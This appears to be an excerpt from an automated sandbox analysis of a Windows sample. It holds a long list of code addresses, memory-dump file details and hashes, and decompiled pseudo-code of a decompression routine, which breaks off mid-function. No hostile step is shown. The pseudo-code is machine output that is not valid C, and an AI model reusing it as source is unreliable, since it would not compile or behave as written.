                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406244
                0x00000000
                0x00406226
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x0040623d
                0x00000000
                0x00000000
                0x00000000
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00000000
                0x00406520
                0x00406524
                0x00000000
                0x00000000
                0x0040652a
                0x0040652e
                0x00000000
                0x00000000
                0x00406534
                0x00406536
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406541
                0x00000000
                0x00000000
                0x00406591
                0x00406595
                0x0040659c
                0x0040659f
                0x004065a2
                0x004065ac
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x00406597
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x004065db
                0x004065db
                0x004065de
                0x004065e5
                0x004065ea
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x004064cb
                0x004064cb
                0x004064ce
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00000000
                0x0040680a
                0x0040680e
                0x00406830
                0x00406833
                0x0040683d
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681a
                0x0040681d
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x004068fe
                0x004068fe
                0x00000000
                0x004068fe
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00406821
                0x00406821
                0x00406824
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x004068bc
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x004068bc
                0x004068bc
                0x00000000
                0x004068c2
                0x004068bc
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406960
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406992
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00000000
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x004068bc
                0x00406843
                0x00406840
                0x00000000
                0x00406477

                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406591, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406591() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
